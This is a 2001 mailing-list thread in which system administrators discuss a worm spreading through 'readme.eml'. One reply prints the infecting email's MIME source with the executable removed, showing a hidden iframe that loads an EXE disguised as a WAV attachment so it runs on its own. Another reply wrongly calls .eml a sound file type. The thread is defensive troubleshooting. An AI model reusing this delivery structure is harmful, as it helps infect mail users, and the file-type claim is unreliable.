> .eml is the file format, if you save an email in Outlook Express.
> Mike
>
> ----- Original Message -----
> From: "Miley, Dan" <[EMAIL PROTECTED]>
> To: "NT System Admin Issues" <[EMAIL PROTECTED]>
> Sent: Tuesday, September 18, 2001 2:10 PM
> Subject: RE: serious network down...readme.eml??
>
>
> > .eml is a sound file type. if there's a sound embedded in a web page,
it
> > executes. (at least in IE.
> >
> > isn't that special.
> >
> > Dan
> >
> > -----Original Message-----
> > From: Adam Meixler [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 2:36 PM
> > To: NT System Admin Issues
> > Subject: RE: serious network down...readme.eml??
> >
> >
> > If it's like the one I've seen, it's an HTML mail that gets opened by
> > something like Outlook Express. The HTML mail has an attachment which it
> > calls from an iframe. The attachment is actually the exe which does the
> > infection. Here's the source of the eml, with the EXE (EA4DMGBP9p) taken
> > out:
> >
> > MIME-Version: 1.0
> > Content-Type: multipart/related;
> > type="multipart/alternative";
> > boundary="====_ABC1234567890DEF_===="
> > X-Priority: 3
> > X-MSMail-Priority: Normal
> > X-Unsent: 1
> >
> > --====_ABC1234567890DEF_====
> > Content-Type: multipart/alternative;
> > boundary="====_ABC0987654321DEF_===="
> >
> > --====_ABC0987654321DEF_====
> > Content-Type: text/html;
> > charset="iso-8859-1"
> > Content-Transfer-Encoding: quoted-printable
> >
> >
> > <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
> > <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
> > </iframe>
> > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm<BR>
> >
> >
> > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm<BR>
> >
> >
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm<BR>
</BODY></HTML>
> > --====_ABC0987654321DEF_====--
> >
> > --====_ABC1234567890DEF_====
> > Content-Type: audio/x-wav;
> > name="readme.exe"
> > Content-Transfer-Encoding: base64
> > Content-ID: <EA4DMGBP9p>
> >
> >
> > --====_ABC1234567890DEF_====
> >
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 1:24 PM
> > To: NT System Admin Issues
> > Subject: RE: serious network down...readme.eml??
> >
> >
> > Stupid Ev Question #327: eml files can be executed?
> >
> > Thanks,
> >
> > Evan
> >
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 1:05 PM
> > To: NT System Admin Issues
> > Subject: RE: serious network down...readme.eml??
> >
> > 1 Unplug servers form network.
> > 2 use ERD to recover.
> > 3 send users home.
> > 4 clean clients.
> > -----Original Message-----
> > From: Terry Manolakos [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 12:21 PM
> > To: NT System Admin Issues
> > Subject: serious network down...readme.eml??
> > My network is slammed with some uknown virus of some sort.....Both my NT
> 4.0
> > servers running MS-Exchange 6.5 have about 2300 alien files which were
> > deleted....a "readme.eml" is being executed by all users somehow
> > automtically and its infecting all my NT domain. I can not
> Ctrl+Alt+Delete
> > to log into any of the servers.....the display shows "initialization of
> the
> > dynamic link library C:\WINNT\system32\USER32.dll failed. The process is
> > terminating abnormally" OKaying this results in no effects....all
servers
> > have this displayed onscreen. For the ones that have admin already
logged
> > in, Services (control panel, settings) can not be accessed! "access to
> the
> > specified device, path, or file is denied"....it seems this virus has
> locked
> > onto this element. PDC is running Exchange (I know, never put'em
> > together...but we're still cleaning up after previous SysAdmins here),
and
> > this has gone bezerk as well, with the same message onscreen.
> > Norton/Symantec doesn't recognize "readme.eml"....who out there can
shine
> a
> > flashlite in this dark mess? thanks in advance.
> > Terry
> > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> > This e-mail may be privileged and/or confidential, and the sender does
not
> > waive any related rights and obligations. Any distribution, use or
copying
> > of this e-mail or the information it contains by other than an intended
> > recipient is unauthorized. If you received this e-mail in error, please
> > advise me (by return e-mail or otherwise) immediately.
> >
>
